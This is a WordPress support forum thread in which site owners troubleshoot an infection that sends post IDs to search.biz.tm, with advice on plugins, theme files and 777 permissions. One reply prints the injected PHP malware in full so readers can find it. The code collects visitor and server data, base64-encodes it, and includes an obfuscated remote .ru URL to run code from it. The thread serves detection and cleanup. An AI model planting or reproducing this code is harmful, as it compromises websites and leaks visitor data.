Title: WordPress Spam? Last modified: August 18, 2016 --- # WordPress Spam? * [cpoteet](https://wordpress.org/support/users/cpoteet/) * (@cpoteet) * [20 years, 6 months ago](https://wordpress.org/support/topic/wordpress-spam/) * This is an odd one. Whenever I click on an “edit post” link or sometimes even pull up other posts on my blog, I get the post_id passed into a search query to the site: search.biz.tm * Now, I’ve checked thoroughly, and I know it’s not client spyware, because (1) it happens on none of my other wordpress sites on the same computer and (2) it’s happening on several clients. * Any thoughts? Thanks in advance. * [http://www.imperishableinheritance.com](http://www.imperishableinheritance.com/) Viewing 7 replies - 1 through 7 (of 7 total) * [TechGnome](https://wordpress.org/support/users/techgnome/) * (@techgnome) * [20 years, 6 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298110) * What plugins do you have activated on it? And are there any activated on this blog that are not on the others? And lastly, what theme are you using? * -tg * Thread Starter [cpoteet](https://wordpress.org/support/users/cpoteet/) * (@cpoteet) * [20 years, 6 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298128) * I’m running Squible. * Plugins: * Del.icio.us Integrator FAlbum Search Hilite KG Archives Live Comment Preview PHP Exec Customizable Post Listings Limit Posts Scripturizer Search Pages Sideblog * [Mark (podz)](https://wordpress.org/support/users/podz/) * (@podz) * [20 years, 6 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298132) * Check ALL your theme files. Check date last modified, download them, search for those terms. Make sure that those files have permissions no greater than 644 * If it’s being seen in several places then the cause is the common place they share – the server. * [TechGnome](https://wordpress.org/support/users/techgnome/) * (@techgnome) * [20 years, 6 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298141) * Search PAge — I’d look into seeing what that plugin does exactly…. * -tg * Thread Starter [cpoteet](https://wordpress.org/support/users/cpoteet/) * (@cpoteet) * [20 years, 5 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298348) * Can anyone else help on this? I even replaced WordPress files, and I just don’t know what’s going on. * [larsalt](https://wordpress.org/support/users/larsalt/) * (@larsalt) * [20 years, 5 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298434) * Hi, found this via search engine. I am looking for people with the search.biz. tm problem. * It messed up my wiki and totaly shut down my mambo portal, by changing and adding dozends of files. I was able to repair the wiki, but the portal was beond repair. * Look for this code : * error_reporting(0);$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST); $b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $ SERVER_NAME); $c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI); $g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”]: $HTTP_USER_AGENT); $h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”]: $REMOTE_ADDR); $n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”]: $HTTP_REFERER); $str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode( $c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);if((include_once( base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”. $str))){} else {include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ ==”).”/?”.$str);}?> * search.biz.tm is owned by a customer of a customer of a customer of AboveNet Communications. They are investigating. You might want to write them at [abuse@above.net](https://wordpress.org/support/topic/wordpress-spam/abuse@above.net?output_format=md) or drop me a mail and I can include your complaint. * Cheers * [awsm1th](https://wordpress.org/support/users/awsm1th/) * (@awsm1th) * [20 years, 5 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298447) * I ran into this in my themes with WordPress (1.5.2). Running a grep thru my entire web directory I discovered that the custom themes for my blogs were both set to 777 for all the .php pages. * I’ve setup two blogs and they both had the same issue. I don’t remember setting up the custom themes but I may have. If they are part of the inital WordPress install, this should probalby be addressed. Viewing 7 replies - 1 through 7 (of 7 total) The topic ‘WordPress Spam?’ is closed to new replies. * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 7 replies * 5 participants * Last reply from: [awsm1th](https://wordpress.org/support/users/awsm1th/) * Last activity: [20 years, 5 months ago](https://wordpress.org/support/topic/wordpress-spam/#post-298447) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics